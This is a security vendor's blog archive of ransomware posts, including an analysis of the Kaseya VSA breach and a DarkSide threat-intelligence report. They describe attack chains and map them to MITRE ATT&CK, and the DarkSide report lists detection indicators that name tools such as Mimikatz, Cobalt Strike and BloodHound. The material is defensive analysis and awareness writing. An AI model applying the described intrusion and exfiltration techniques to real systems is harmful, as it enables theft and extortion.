Tag Archive for: ransomware

Cybersecurity Predictions for 2023: Looking Ahead

/by

The last few years have been difficult for all of us and for many, and unfortunately, 2022 did not bring the reprieve we were hoping for. Not only did we experience ongoing supply chain issues and extreme staffing shortages, but we were forced to navigate soaring inflation and economic turmoil, as well as overall political unrest.

Alongside all these problems is the growth of cyberattacks, both on individuals and organizations—and this trend is expected to continue, with increasing frequency and sophistication. And while the pandemic accelerated the digital transformation trend, it has also created new opportunities for cybercriminals to attack.

Cybersecurity continues to be a major concern for corporate America. In fact, most of today’s security and risk leaders understand that if their organization incurs a successful cyberattack, it will cause momentous disruptions to business. While we continue to battle the ever-changing threat landscape, proper planning, and effective solutions can be developed to reduce the potential risk and damage. The key is to be prepared for the road ahead.

Here are the four cybersecurity predictions we expect to see in the coming year:

Increased Measures for Ransomware

Given the continued rise of ransomware attacks on organizations, we expect to see an increase in the number of countries passing legislation to control payments, fines, and negotiations. This change will encourage organizations to be more proactive in their cybersecurity and ensure they follow proper procedures when an incident occurs.

With or without governments involvement, it will become imperative for companies to employ solutions that help to prevent attacks. For example, in a 2021 White House cybersecurity mandate, multi-factor authentication (MFA) to secure access was named as an important preventative measure. Having an MFA tool is also a requirement of many of today’s cyber insurance policies in an effort to control points of exposure. In general, there will be more steps taken – both at the organizational and government levels – to help ensure we stay ahead of cybercriminals.

Supply Chain Attacks

The number of cyberattacks related to third-party vendors is undoubtedly on the rise. However, only a small percentage of security and risk managers are currently checking external vendors for security exposure.

As this trend continues, organizations will begin to make cybersecurity risk a determining factor in doing business with third parties. This will range from simple oversight of a critical technology vendor to complex due diligence for mergers and acquisitions. In fact, according to research from Gartner, by 2025, 60 percent of companies will use cybersecurity risk as a determining factor when conducting third-party business transactions and engagements.

Vendor Consolidation

Consolidation of security vendors will be another popular trend. Studies show that many CISOs have a high number of tools in their cybersecurity portfolio. Because purchasing a mix of tools from different security vendors can result in complex security operations and increased requirement for security headcount, it is becoming vital to have less vendors and more consolidated solutions. And many single-vendor solutions offer better security effectiveness and efficiency for today’s businesses. As a result, organizations are creating strategies to unify their security toolset to reduce vendor fatigue and simplify their security operations.

Passwordless Authentication in Partnership with a Zero Trust Framework

Going passwordless and developing a Zero Trust framework, requiring rigid authentication to gain access to a system, will continue to grow in popularity in the coming year. In fact, studies show that more than half of the organizations surveyed already have a Zero Trust initiative in place, and more than 95 percent of organizations plan to embrace Zero Trust as a starting point for security in the next 12 to 18 months.

Additionally, passwordless authentication will help make the implementation of Zero Trust more effective in achieving a layered approach to security. By using approach, instead of relying on just a password as a form of verification, organizations will depend on more secure authentication methods, such as biometrics and AI-powered verification. This takes into account numerous factors to grant, verify, or deny access.

Looking Ahead

Our world has changed enormously. Not only have businesses had to adjust to numerous ups and downs related to the pandemic, but they have had to adopt new technologies that support a different type of workforce. As we enter 2023, we must think about our security efforts and how we can continue to be vigilant about protecting our organizations against cybercriminals. We can use lessons learned not only to make cybersecurity predictions for 2023, but also to better help us manage risks and defend against the increasingly complex cyber threat landscape.

No matter what your cybersecurity plans are for the coming years, Proficio’s team of security experts is here to help. Our services help organizations mitigate cybersecurity risks, so you can be confident your networks are protected 24/7. To learn more about how Proficio can help your organization stay safe, contact us.

The Top Cyberattacks on Small & Medium Businesses

/by

Not long ago, it seemed that cybercriminals were mainly targeting large companies. As bigger targets, they may have more gaps to sneak in…and oftentimes, more risk to data and reputation. But times have changed, and for many of today’s small- and medium-sized businesses (SMBs), they know this is no longer the case. In fact, some reports indicate the number of cyberattacks on SMBs are significantly higher than attacks on larger companies. According to a 2021 study, small businesses experience 350 percent more social engineering attacks than those at large businesses.

To make matters worse, it is challenging for SMBs to recover from a cyberattack given their limited resources. A recent report revealed that the cost of a cyberattack on SMBs created losses of more than $2.5 million, on average. In addition to the steep financial damage, these smaller businesses must navigate the serious reputational damage that often results from these attacks – which sometimes may be too much to recover from.

With all of these things working against SMBs, it’s no wonder that cybercriminals are changing their focus. They know these business leaders tend to have limited resources when it comes to IT security, which may mean they have less rigorous defenses, as well as less time and manpower to apply toward cyber protection. And this makes them appear to be much easier targets for hackers.

But this doesn’t have to be the case. To help lessen the risk of cyberattacks on SMBs, it’s critical to understand some of the most common threats they face and how to best stay protected.

Phishing Scams

One of the most widespread and damaging threats facing small and medium businesses are phishing attacks. Phishing not only accounts for 90 percent of all breaches that organizations face, but they account for more than $4 million in business losses. These scams, which occur when attackers pretend to be a trusted contact or site, have become smarter and more targeted in recent years. Once a cybercriminal successfully lures a user to click a malicious link, download a malicious file, or provide access to sensitive information, account details, or credentials, they can unlock the door to much more far reaching company data.

To avoid these types of cyberattacks on SMBs, companies should provide their users with comprehensive cybersecurity training. Tips should include:

  • Always ensure the sender and email address match and verify all links before you click them
  • Double-check with senders to ensure they sent the email
  • Verify the legitimacy of emails via your IT team.
  • Never post or email sensitive/personal information online

Cybersecurity training for employees is a critical step, but it’s also good to have your backend configured well– if and when an attacker breaks into your organization. These include:

  • Ensuring you consistently back up data
  • Maintaining software updates and patches
  • Using an email filtering program
  • Developing protocols to verify suspicious communications, and how users can report them (also part of employee training)

Ransomware

Ransomware is the type of malware most people are familiar with. When installed, it prevents users from accessing their systems/personal files and demands payment to regain access. This information, which typically includes passwords, files, databases, credit card details, personal information, or other valuable assets, is critical to a business so once activated, businesses will scramble to get back online. These types of cyberattacks on SMBs are commonly spread through email spam and network attacks.

According to a recent study, 84 percent of SMBs are concerned about a ransomware attack impacting their business, and 60 percent are not confident–or only somewhat confident– that they can fend off a ransomware attack.

Your best offense is a strong defense. While it’s not always possible to stop these attacks, there are some things you can do to catch them before they cause too much damage. Setting up endpoint security and antivirus software is a good starting point, as long as you ensure they are kept updated. More importantly, having monitoring set up helps you catch the early signs of an attack, so you can stop the malicious behavior before it does serious damage. If you don’t have the team in-house to support this 24/7, look for a security partner who can help you improve your security defenses.

Insider Threats

The actions of current and former employees, contractors, vendors, partners, and associates can lead to devastating results if not properly managed. Many of these individuals have access to vital company data, which if in the wrong hands, can cause harm to your organization—either by accidentally clicking a malicious link or intentionally stealing or leaking company data. Studies found that 60 percent of data breaches were caused by insider threats, and the current average annual cost of an insider threat is more than $11 million.

Building a strong culture of education and cybersecurity awareness within an organization is an important step to blocking insider threats. Additionally, organizations should have a thorough new hire screening and off-boarding process, and create security policies and use cases to detect misuse of company resources.

Weak Passwords

While the recommendation of setting a strong password has become a commonplace, the amount of individuals using weak passwords is still high, making this another problem that make it easy for cybercriminals to attack SMBs. In fact, studies show that 59 percent of professionals use their name or birthdate in their password, and 43 percent regularly share their passwords.

This is why many of today’s businesses are choosing to implement multi-factor authentication (MFA) technologies. This second layer of protection forces users to employ more than just a password to access business accounts. It’s not full proof (and surprisingly, a lot of businesses still haven’t implemented this), but it does help to prevent identity attacks. In addition, it is essential to implement and enforce a strong password policy, making sure passwords should consist of more than 12 characters, as well as random numbers, symbols, and letters, and must be changed on a regular basis.

Protecting your Business

While there are many different cyberthreats out there, there are several ways you can reduce the likelihood of a cyberattack on your SMB. If you don’t have the internal resources to stay protected, Proficio can help. We tailor our security services to help SMBs mitigate the risks of cyber threats, so you can be confident your organization is protected.

To learn more about how Proficio can help your organization stay safe, contact us.

Best Practices for Endpoint Security

/by

In today’s highly technical world, endpoint devices are everywhere. Endpoint devices, such as employee workstations, laptops, tablets, and smartphones, connect to and communicate with an organization’s network. Because they are intertwined within an organization, it often only takes successfully exploiting one endpoint for threat actors to carve a path through an organization’s network to cause harm.

Studies show that 61 percent of businesses have 1,000 or more endpoints users on their networks. They are a critical part of daily business and are also targets to a wide range of cyberthreats, which is why endpoint security should be a priority for all organizations.

As often is with cybersecurity, the best defense of endpoints is a good offense. But where do you start? We’ve put together a guide for endpoint security best practices so you can better prepare your organization.

Why Prioritize Endpoint Security?

If you think of endpoints as entryways into your network, it’s clear that securing every endpoint against malicious actors is important or you could be leaving the back – or even front – door open to cybercriminals.

For those organizations offering flexible work options, the increase in mobile working and remote employees introduces greater security risks to endpoints. As users connect your company’s network and access business resources from off-premises devices or in the cloud, traditional network perimeter controls are no longer sufficient to protect your company’s information.

A recent study found that 68 percent of surveyed companies experienced one or more endpoint attacks that successfully compromised data and/or IT infrastructure. Cybercriminals and nation-states carry out increasingly sophisticated attacks on endpoints to:

  • Access valuable assets, including trade secrets or intellectual property
  • Exfiltrate data
  • Disrupt important services

The financial and reputational impacts of cyberattacks make it imperative for companies to take a comprehensive approach to endpoint security and use effective measures that combat modern cyberthreats.

While there are many different threats to endpoints, both internal and external, here are some of the most common:

  • Ransomware/Malware
  • Unpatched Vulnerabilities
  • Fileless Attacks
  • Compromised User Accounts

Following some endpoint security best practices puts the foundations in place to protect your networks from the range of cyber threats that inundate companies daily. These include:

  • Consistent Updates
  • Endpoint Security Tools
  • Employee Awareness
  • Detection and Response

Download the full Securing the Endpoint Guide below

Download the Endpoint Guide

 

A Discussion Around The Challenges Todays Security Officers Face | A Cyber Chat with EVOTEK – Full Episode

/by

From budget cuts to cyberattacks, today’s CISOs must continuously stay on their toes to keep their organizations protected. On this episode of Cyber Chats, industry veterans Brad Taylor, Proficio’s CEO, and Macy Dennis, EVOTEK Chief Security Officer, sit down to discuss the challenges many Security Officers face.

This includes the increasingly complex ransomware attacks and best practices for being prepared for a cyber incident. Tune in to see what tips they provide to help keep your organization secure.

Kaseya VSA Security Breach

/by

Overview | Kaseya VSA

On July 2, 2021, right before Americans started their long, Independence Day weekend, hackers once again made their way to the top of the news headlines. This time, the victim of the largest ransomware attack was Kaseya, a technology company that sells its technology to other third-party providers, mainly managed service providers (MSPs).

Speculations have suggested that the attack was yet another supply-chain ransomware attack. Multiple security firms and researchers have concluded that the attackers chose to exploit a zero-day vulnerability rather than tampering Kaseya’s codebase to distribute the malware. REvil/Sodinokibi ransomware threat actors were found to be responsible for the attack, exploiting a zero-day vulnerability to remotely access internet facing Kaseya VSA servers. Using this method, they hacked through less than 40 VSA servers and were able to deploy the ransomware to over a thousand enterprise networks.

What is Kaseya VSA?

Kaseya VSA, the Virtual System/Server Administrator is marketed as an endpoint management and network monitoring system that allows its client to have a unified remote monitoring and management platform. Users can perform functions such as remote controls to end-user computers, discovery and inventory on a client’s infrastructure, patch management to have a centralized system deploying software updates across all endpoints and monitoring and alerting of incident across the network. This makes it a convenient solution for MSPs to remotely manage their customer’s IT infrastructure and provide IT support and cybersecurity services to multiple enterprises. Kaseya VSA is also designed to have administrator rights provided down to all client systems.

In this incidence, an attacker had abused Kaseya VSA’s auto-update function and maliciously pushed the REvil ransomware onto Kaseya’s clients. This allowed the ransomware to reach to more victims, not only affecting Kaseya VSA customers but also the customers of MSPs that are using Kaseya VSA systems.

Kaseya Ransomware Timeline

Timeline of how the attack affected MSPs client systems

What Happened?

Various articles and researchers have concluded that attackers leveraged the standard VSA product functionality to deploy ransomware to the endpoint users. The attacker had exploited the zero-day vulnerability currently assigned the CVE-2021-30116 identifier.

The Kaseya zero-day vulnerability was discovered by Dutch Institute for Vulnerability Disclosure [DIVD] researcher Wietse Boonstra in early April, and had been shared with Kaseya prior to its exploitation in these ransomware attacks. Unfortunately, REvil attackers had managed to find the security flaw and attack by exploiting the vulnerability before Kaseya was able to issue or release a patch, resulting in this large-scale ransomware infection.

Given that the incident is currently in the middle of the investigation and patching stage, full details of the zero-day vulnerability “CVE-2021-30116” are currently not disclosed to the public. However, various research suggests that this vulnerability allows a remote non-authenticated attacker to compromise the affected system. To exploit this vulnerability, the attacker sends a specially crafted request to the affected application. Researchers have also concluded that the attacker managed to bypass authentication on the internet facing VSA web panel, exploit an arbitrary file upload, and execute commands via SQL injection on the VSA appliance.

Evidence of an executable code containing actions that would disable existing user sessions, remove IIS logs, and other cleanup activities has also been found. This attack appears to be geographically dispersed and the impact appears to have been restricted to systems running the Kaseya software.

The attack distributed its malicious payload in the form of a “Kaseya VSA agent hot-fix” launching the malicious software update package that targeted customers of MSPs and enterprise users of the on-site version of Kaseya’s VSA remote monitoring and management platform. The VSA appliance that had deployed a “Kaseya VSA agent hot-fix” package was observed to have bypassed antivirus solutions using an older and vulnerable version of the Microsoft Defender app, which it used to encrypt local workstations.

After compromising an MSP that utilizes Kaseya VSA, the attackers subsequently disabled the client’s administrative access to their respective Kaseya VSA platform, allowing the attackers to gain administrative access to all endpoints managed by Kaseya VSA. Upon gaining administrative access, the attackers were observed attempting to disable Microsoft Defender Real-Time Monitoring via PowerShell and deploy the ransomware.

REvil Ransomware

Various evidence, such as ransom notes dropped onto the infected systems, revealed that this cyber incident was closely tied with REvil/Sodinikibi ransomware group. The REvil ransomware group had also stepped forward to confirm associations with this attack after claiming the responsibility on its Dark Web leak site.

This is not the first time that the REvil ransomware group had topped news headlines. However, in this attack, REvil’s operators took a different approach in how they negotiate the ransom. REvil attacks can use multiple encrypted file extensions and typically will provide a decryptor that decrypts all encrypted extensions. In this attack, REvil demanded ransom payments made for each individual encrypted file extension found on a victim’s network, as opposed to their usual method of providing one decryptor to decrypt all encrypted file extensions.

The attackers are willing to provide a universal decryptor for victims of the attack, but only under the condition that they are paid $70 million in Bitcoin. The value has reportedly recently been lowered to $50 million.

REvil representatives have also responded to victims during the negotiation stage that in this attack, they had only encrypted networks and nothing more. Based on this information, it was suggested that REvil did not steal any victim’s data, which is typically what they utilize as a factor during the negotiation stage. This also indicates that the ransomware operation did not access the victim’s networks before the attack; however, it is still uncertain as to the extent of damage that was brought to the victim’s environment.

Riding the Waves

It is not a surprise that upon a new zero-day vulnerability disclosure or vulnerability being exploited by a cybercriminal group, other threat actors would take advantage of this opportunity and ride on the waves. Not long after the Kaseya attack, a new malspam campaign was observed containing various subject titles claiming to contain patch for Kaseya vulnerability. The attachment found in this malspam campaign appears to drop Cobalt Strike malware likely targeting users utilizing Kaseya products. Cobalt strike malware attachments appear to be the first malware that was found in the wild exploiting the current Kaseya situation.

MITRE ATT&CK

The following are the MITRE ATT&CK Tactics and Techniques associated with the Kaseya attacks:

Tactics Techniques
Resource Development Obtain Capabilities: Vulnerabilities (T1588.006)
Resource Development Obtain Capabilities: Exploits (T1588.005)
Initial Access Exploit Public-Facing Application (T1190)
Execution Command and Scripting Interpreter: PowerShell (T1059.001)
Persistence Hijack Execution Flow : DLL Side-Loading (T1574.002)
Defense Evasion Masquerading : Rename system utilities (T1036.003)
Defense Evasion Impair Defences: Disable or Modify Tools (T1562.001)
Defense Evasion Deobfuscate/Decode Files or Information (T1140)
Defense Evasion Hijack Execution Flow: DLL Side-Loading (T1574.002)
Defense Evasion Indicator Removal on Host: File Deletion (T1070.004)
Defense Evasion Modify Registry (T112)
Defense Evasion Subvert Trust Controls: Code Signing (T1553.002)
Impact Data Encrypted for Impact (T1486)

General Recommendations

Given that the vulnerability is newly discovered, there is still a lot of uncertainty about this attack and how it would affect clients utilizing Kaseya VSA software. As such, it is advised for clients utilizing Kaseya VSA software to have all on-premises VSA Servers to remain offline until further instructions from Kaseya on when it is safe to restore operations when a patch is made available to the public.

We strongly recommend to follow the guidelines by Kaseya, FBI and CISA if you use Kaseya VSA for your IT infrastructure and/or to reach out to your MSP if you are currently leveraging one for any IT-related management.

It is important to note that Proficio does not use Kaseya or any of its products.  If you have questions, please do not hesitate to contact your Customer Success Manager or Security Advisor.

 

Lessons Learned: Ransomware Attacks in 2021

/by

While ransomware attacks in 2021 never cease to stop, several high-profile occurrences in the first half of the year gained swift notoriety for either the scale of damage they inflicted or the targets they focused on. Here are four of the biggest attacks, and the lesson that can be learned from each.

Colonial Pipeline

A natural place to begin is with the most severe cyber-attack to ever target critical infrastructure in the United States. Instigated by the DarkSide ransomware group, this has been one of the most newsworthy ransomware attacks in 2021, targeting the IT environment tied to a pipeline system that extends from Texas to New York.

Hackers used a VPN account and a leaked password to gain access to the Colonial Pipeline network. The attack was noticed on May 7, 2021, when an employee saw a message on a computer screen in the control room, demanding a cryptocurrency payment. An operations supervisor decided to respond to the attack by taking the unprecedented step of shutting the entire pipeline down.

Colonial Pipeline decided to make the ransom payment of $4.4 million in bitcoin – and as a positive turn, with the help of the FBI, part of the payment has been recovered. The disruption to the pipeline lasted five days before normal operations resumed.

Takeaway: Use multi-factor authentication so that even if a password becomes compromised, hackers need to provide an additional category of evidence to access a resource on your network.

Acer

Taiwanese computer manufacturer Acer became the victim of another notable ransomware attack in March 2021. It’s believed a Microsoft Exchange vulnerability provided an entry route into Acer’s network.

The REvil ransomware group demanded a $50 million payment to return stolen data, releasing samples on the dark web. It’s not publicly known whether Acer paid the ransom.

 Takeaway: Hacking groups don’t keep a 9-5 schedule. It’s critical for organizations to use 24-7 monitoring solutions that constantly seek out new types of attacks, critical vulnerabilities, and suspicious behavior on your network. A dedicated security operations team can provide 24-7 incident monitoring, detection, and response.

Sierra Wireless

Among several high-profile technology companies hit by ransomware attacks in 2021 was the wireless communications equipment designer and manufacturer, Sierra Wireless. The attack targeted both the company’s internal IT systems and corporate website.

Production at the company’s manufacturing locations was temporarily halted while the company quickly initiated measures to counter and contain the damage. While the internal network and corporate website remained affected for a few days, any customer-facing products and services weren’t impacted.

Takeaway: The swift response during the Sierra Wireless attack is critical for rapid threat containment. Fast action can make the difference between an attempted hack and a devastating breach, which is why automated response solutions are essential for modern organizations.

Scripps Healthcare

Finishing things off is one of the most targeted industries – healthcare. In May 2021, a hospital in our own backyard was taken offline for almost a month due to a sophisticated ransomware attack.

While not much is currently known about this attack, during the same timeframe, we saw a similar attack take down Ireland’s Health Service Executive. This attack was due to an employee that unknowingly clicked a malicious link, and the cybercriminals demanded almost €15 million to return 700 gigabytes of confidential patient data.

Takeaway: Opportunistic hackers don’t take ethical or moral considerations into account when looking for targets to exploit. Knowing the signs of a ransomware attack in its early stages is key to stopping cybercriminals before they get into your networks.

 

Conclusion

While the ransomware attacks in 2021 that make media headlines often involve public infrastructure, health services, and large corporations, these incidents can happen just as easily on small to medium businesses. As we often say – it’s not a matter of if you’ll be attacked, but when – so regardless of the size of your company, preparation is vital to staying safe.

DarkSide Ransomware

/by

Overview | Darkside Ransomware

DarkSide ransomware was first discovered in the wild in August, 2020. It runs a Ransomware-as-a-Service (RaaS), whereby affiliates are able to deploy the ransomware for a fee or a cut of the proceeds from successful ransom payments.

The DarkSide ransomware group was brought to mainstream attention due to the recent ransomware attack against Colonial Pipeline. The Proficio Threat Intelligence Team posted information and articles about the Colonial Pipeline attack in our Twitter Feed. Below, we provide more detailed findings based on our research of DarkSide ransomware.

What We Know About the DarkSide Ransomware Group

DarkSide ransomware group attacks are highly targeted, and affiliates are able customize the ransomware executable for the specific organization they are attacking. Organizations that are targeted typically have the finances to pay large ransom amounts. After the attack on Colonial Pipeline, the DarkSide ransomware group has publicly stated that they are apolitical and their goal “is to make money, not create problems for society”.

However, affiliates are not allowed to attack organizations from the following sectors:

  • Healthcare
  • Funeral services
  • Education
  • Public sector
  • Non-profit organizations
  • Government sector

The DarkSide ransomware group also has a website where they publish data stolen from victims who refuse to pay the ransom. This is a method of further pressuring victims to pay, following a trend observed among ransomwares throughout 2020, including DoppelPaymer and REvil/Sodinokibi.

How DarkSide Ransomware Attacks Work

The initial entry method of DarkSide ransomware attacks can vary depending on the affiliate carrying out the attack. There is currently no public information on the initial entry method used in the attack on Colonial Pipeline, however example methods observed from past DarkSide ransomware attacks include:

  • Exploiting hardware/software vulnerabilities
  • Exploiting remote access services (such as RDP)
  • Access victim’s network using legitimate credentials, obtained by:
    • Phishing attacks
    • Password attacks (such as password spraying)
    • Purchasing from a third-party source

After gaining access to the victim’s environment, the attackers will move laterally throughout the network and perform internal reconnaissance to gather information before encrypting data. The following have been observed being utilized in previous attacks for reconnaissance/lateral movement:

  • PSExec
  • RDP connections
  • SSH
  • Mimikatz
  • Cobalt Strike
  • BloodHound

Information gathered during the internal reconnaissance also includes credentials stored in files, memory and domain controllers; the stolen credentials are then used to access privileged accounts. PowerShell commands are executed to delete shadow copies which wipes backups and file snapshots to prevent recovery.

Stolen data is exfiltrated before deploying DarkSide ransomware to encrypt the victim’s files. Upon successful encryption, the ransomware appends a victim’s ID as an extension to file names. A ransom note with the naming convention of “README.[victim’s_ID].TXT” is dropped onto the victim’s device with instructions for the victim to access a Tor website using a Tor browser to pay the ransom – and if unpaid, they threaten to publish the stolen data.

Example of a Ransom Note Darkside Ransomware

Figure 1- Example of a Ransom Note

Known DarkSide Affiliates

As previously mentioned, DarkSide ransomware can be used by different affiliates and as such, different Darkside attacks can utilize different tools and tactics depending on the affiliate. Below are examples of different attack flows by three affiliates that were identified by FireEye.

UNC2628

This affiliate group is suspected to have used a password spraying attack against the victim’s VPN to gain initial access into the environment. The attackers utilized Cobalt Strike beacons for C2 communications and Mimikatz for credential theft. Lateral movement was performed using RDP connections and Cobalt Strike.

The attackers exfiltrated stolen data using Rclone, a command line utility to manage files for cloud storage applications, to cloud-based storages. DarkSide ransomware is then deployed using PsExec.

The following is a MITRE ATT&CK table of this affiliate’s attack:

Tactics Techniques
Credential Access [TA0006] Brute Force: Password Spraying [T1110.003]
Initial Access [TA0001] Valid Accounts [T1078]
Resource Development [TA0042] Obtain Capabilities: Tool [T1588.002]
Credential Access [TA0006] OS Credential Dumping [T1003]
Lateral Movement [TA0008] Remote Services: Remote Desktop Protocol [T1021.001]
Command and Control [TA0011] Application Layer Protocol: Web Protocols [T1071.001]
Execution [TA0002] Command and Scripting Interpreter [T1059]
Execution [TA0002] System Services: Service Execution [T1569.002]
Exfiltration [TA0010] Exfiltration Over Web Service: Exfiltration to Cloud Storage [T1567.002]
Impact [TA0040] Data Encrypted for Impact [T1486]

UNC2659

This affiliate group gains initial access by exploiting the SonicWall vulnerability CVE-2021-20016. After gaining access to the victim’s environment, the attackers download the tool TeamViewer from the official website onto the victim host to establish persistence within the environment.

This group was also observed utilizing Rclone for data exfiltration, which is downloaded from the official website onto the victim host. The stolen data is exfiltrated to cloud-based storages.

The following is a MITRE ATT&CK table of this affiliate’s attack:

Tactics Techniques
Initial Access [TA0001] Exploit Public-Facing Application
Resource Development [TA0042] Obtain Capabilities: Tool [T1588.002]
Command And Control [TA0011] Remote Access Software [T1219]
Execution [TA0002] Command and Scripting Interpreter [T1059]
Exfiltration [TA0010] Exfiltration Over Web Service: Exfiltration to Cloud Storage [T1567.002]
Impact [TA0040] Data Encrypted for Impact [T1486]

UNC2465

This affiliate group utilized a backdoor named “SMOKEDHAM” to gain access to the victim’s environment, which is delivered via phishing emails and legitimate services such as Google Drive and Dropbox. Advanced IP Scanner, BloodHound, and RDP were used for internal reconnaissance, and Mimikatz was used for credential theft.

The attackers also used the NGROK utility to bypass firewalls and expose remote service ports such as RDP to the Internet. The DarkSide ransomware is deployed using PsExec and scheduled tasks.

The following is a MITRE ATT&CK table of this affiliate’s attack:

Tactics Techniques
Initial Access [TA0001] Phishing: Spearphishing Link [T1566.002]
Resource Development [TA0042] Obtain Capabilities: Tool [T1588.002]
Lateral Movement [TA0008] Remote Services: Remote Desktop Protocol [T1021.001]
Credential Access [TA0006] OS Credential Dumping [T1003]
Defense Evasion Impair Defenses [T1562]
Execution [TA0002] System Services: Service Execution [T1569.002]
Impact [TA0040] Data Encrypted for Impact [T1486]

General Recommendations

Although DarkSide ransomware attacks can involve different tactics and tools, based on which threat group is making use of their RaaS, the tactics, techniques and tools deployed are not completely different as they share the common DarkSide platform. The variety of tactics and techniques deployed should serve as a clear indication that focusing on any single threat will not provide adequate coverage, in terms of ensuring that an organization is well protected from the broad array of security threats.

The use of EDR solutions provide valuable visibility into endpoints and important systems, so they should play a big role in dealing with ransomware attacks. We also recommend a defense-in-depth approach for securing your network and environment, including ensuring there is proper segmentation and security device visibility between network segments, particularly critical network segments. Traditional security architecture, that focuses solely on securing the perimeter, are inadequate in dealing with modern day persistent threats, though they play an important part.

An organization with proper network segmentation and security device coverage can then make use of the following general suspicious indicators/activities that serve as a useful way to monitor for to identify potential DarkSide ransomware attacks:

  • Attacks on VPN infrastructure (exploiting vulnerabilities or through password spraying attacks)
  • Phishing emails
  • Deployment, use and download of common exploit and bypass tools like Mimikatz, Cobalt Strike and BloodHound
  • Unauthorized deployment, use and download of remote access tools (Teamviewer, Remote Desktop, etc)
  • Installation of suspicious or unknown services
  • Data exfiltration to cloud storage

Proficio has already deployed a wide variety of use cases that can be effectively utilized to detect such common indicators or activities. Of course, the effectiveness of the use cases depends on the log sources being monitored and their visibility into the environment or network. We recommend reaching out to your security advisors or client success managers to understand the use cases deployed for your environment and how we can work together to increase the efficacy of our monitoring, detection and discovery efforts.

The Proficio Threat Intelligence Team will continue to research and investigate all new threats to identify the best way to start a threat hunting campaign. And as always, we will keep all of our clients informed on our efforts in this area.

Precautionary Measures

Prevention is better than cure. It is advisable to safeguard you and your organization to avoid being the next victim of this ransomware attacks. We would recommend organization to consider the following measures.

  • Keep your anti-virus software / EDR solutions and other security tools installed on the systems updated for detection and prevention from the spread of ransomware.
  • Performing regular backups on critical files and systems.
  • Keeping your operating systems and accessible services up to date on the latest security patches.
  • Make use of Multi-Factor Authentication to govern access as much as possible.
  • Make use of network segmentation alongside the zero-trust model.
  • Close unnecessary network ports to reduce entry points for attackers.
  • Apply content filters on email gateways and email systems to prevent malicious content from reaching users and reduce the chance of a possible compromise.
  • Educate your employees and users to improve cybersecurity awareness.